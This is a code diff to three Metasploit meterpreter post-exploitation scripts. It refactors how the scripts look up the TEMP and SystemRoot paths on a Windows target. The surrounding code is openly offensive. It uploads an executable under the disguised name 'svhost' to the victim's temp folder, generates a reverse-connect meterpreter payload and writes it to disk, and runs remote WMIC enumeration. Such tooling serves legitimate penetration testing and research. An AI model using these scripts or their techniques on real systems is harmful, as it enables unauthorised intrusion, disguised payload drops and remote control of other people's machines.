scripts/meterpreter/remotewinenum.rb

@@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
   runfail = 0
   runningas = session.sys.config.getuid
   begin
-    tmp = session.fs.file.expand_path("%TEMP%")
+    tmp = session.sys.config.getenv('TEMP')
     # Temporary file on windows host to store results
     wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
 

scripts/meterpreter/scheduleme.rb

@@ -179,7 +179,7 @@ end
 #---------------------------------------------------------------------------------------------------------
 
 def upload(session,file)
-  location = session.fs.file.expand_path("%TEMP%")
+  location = session.sys.config.getenv('TEMP')
   fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
   print_status("Uploading #{file}....")
   session.fs.file.upload_file("#{fileontrgt}","#{file}")

scripts/meterpreter/schelevator.rb

@@ -99,6 +99,10 @@ upload_fn = nil
   end
 }
 
+envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
+sysdir = envs['SystemRoot']
+tmpdir = envs['TEMP']
+
 # Must have at least one of -c or -u
 if not cmd and not upload_fn
   print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@@ -110,9 +114,8 @@ if not cmd and not upload_fn
   raw  = pay.generate
   exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
   #and placing it on the target in %TEMP%
-  tempdir = client.fs.file.expand_path("%TEMP%")
   tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
-  cmd = tempdir + "\\" + tempexename + ".exe"
+  cmd = tmpdir + "\\" + tempexename + ".exe"
   print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
   fd = client.fs.file.new(cmd, "wb")
   fd.write(exe)
@@ -139,8 +142,6 @@ end
 #
 # Upload the payload command if needed
 #
-sysdir = session.fs.file.expand_path("%SystemRoot%")
-tmpdir = session.fs.file.expand_path("%TEMP%")
 if upload_fn
   begin
     location = tmpdir.dup